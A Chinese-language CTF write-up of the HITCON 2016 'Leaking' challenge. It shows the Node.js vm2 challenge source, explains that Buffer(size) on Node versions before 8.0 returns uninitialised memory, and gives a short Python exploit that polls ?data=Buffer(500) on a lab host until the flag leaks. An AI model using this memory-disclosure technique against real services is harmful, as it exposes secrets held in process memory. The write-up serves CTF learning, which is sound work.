[HITCON 2016]Leaking

2022年6月2日00:43:07评论55 views字数 1466阅读4分53秒阅读模式

0x01 源码

"use strict";
var randomstring = require("randomstring");var express = require("express");var {    VM} = require("vm2");var fs = require("fs");
var app = express();var flag = require("./config.js").flag
app.get("/", function(req, res) {    res.header("Content-Type", "text/plain");
    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */    eval("var flag_" + randomstring.generate(64) + " = "hitcon{" + flag + "}";")    if (req.query.data && req.query.data.length <= 12) {        var vm = new VM({            timeout: 1000        });        console.log(req.query.data);        res.send("eval ->" + vm.run(req.query.data));    } else {        res.send(fs.readFileSync(__filename).toString());    }});
app.listen(3000, function() {    console.log("listening on port 3000!");});

这是一道关于node.js沙箱逃逸的问题

大致说一下题目的描述，首先定义变量flag，然后我们可以在沙箱里面执行任意的命令，那我们如何逃逸出去呢?

在较早一点的 node 版本中 (8.0 之前)，当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer，并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。

这儿的环境是8.0之前的，所以我们使用Buffer()来读取内存，这个和Linux读内存原理差不多~~

exp:

# encoding=utf-8
import requestsimport timeurl = 'http://402a95ea-15ad-46a2-be88-35e62822cb27.node3.buuoj.cn/?data=Buffer(500)'response = ''while 'flag' not in response:        req = requests.get(url)        response = req.text        print(req.status_code)        time.sleep(0.1)        if 'flag{' in response:            print(response)            break